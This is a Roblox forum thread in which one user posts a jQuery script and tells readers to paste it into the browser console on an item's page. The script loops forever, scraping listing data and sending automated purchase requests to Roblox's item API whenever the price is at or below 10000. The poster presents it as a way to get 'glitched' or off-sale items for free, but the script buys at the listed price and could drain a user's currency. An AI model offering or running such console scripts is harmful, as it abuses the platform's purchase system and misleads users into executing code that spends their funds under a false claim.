Glitch Script [ROBLOX]

Pres. Jordan
Joined 02/04/2018
Posts 3,042
12:10 PM 19/02/2019
ok here use this on glitched items.

1. Press f12 on the page of the item
2. Go to console
3. paste in this script:
function buy(){

var id = 1230405253;
var price = 10000;
$.get('https://www.roblox.com/catalog/' + id, function(data){
var html = $(data);
var bestprice = $('#item-container', html).attr('data-expected-price');
var sellerid = $('#item-container', html).attr('data-expected-seller-id');
var productid = $('#item-container', html).attr('data-product-id');
var userasset = $('#item-container', html).attr('data-lowest-private-sale-userasset-id');

if(bestprice <= price){
$.ajax({
type: 'POST',
url: 'https://www.roblox.com/API/Item.ashx?rqtype=purchase&productID=' + productid + '&expectedCurrency=1&expectedPrice=' + bestprice + '&expectedSellerId=' + sellerid + '&userAssetID=' + userasset
});
console.log('Item Found For ' + bestprice);
}
}).promise().done(buy);
}

console.log('Bot Started.');
buy();


Brylan
Joined 07/01/2019
Posts 15,061
12:11 PM 19/02/2019
ok then


[Forum] Iqra
Joined 25/11/2018
Posts 8,344
12:30 PM 19/02/2019
I play on mobile. Also why haven’t you added me yet


[Deleted37558]
Joined 27/12/2018
Posts 1,518
12:42 PM 19/02/2019
[ Content Removed ]


Pres. Jordan
Joined 02/04/2018
Posts 3,042
01:35 PM 19/02/2019
Quote from [Deleted37558] , 12:42 PM 19/02/2019
[ Content Removed ]
nah this is true, roblox accidentally leaked it onstream when editing the site, and then they ended stream and a bunch of people used it on off-sale items and got them for free.


[Deleted37558]
Joined 27/12/2018
Posts 1,518
04:47 PM 19/02/2019
Quote from Pres. Jordan , 01:35 PM 19/02/2019
Quote from [Deleted37558] , 12:42 PM 19/02/2019
[ Content Removed ]

nah this is true, roblox accidentally leaked it onstream when editing the site, and then they ended stream and a bunch of people used it on off-sale items and got them for free.
[ Content Removed ]


[Deleted37558]
Joined 27/12/2018
Posts 1,518
04:50 PM 19/02/2019
[ Content Removed ]

1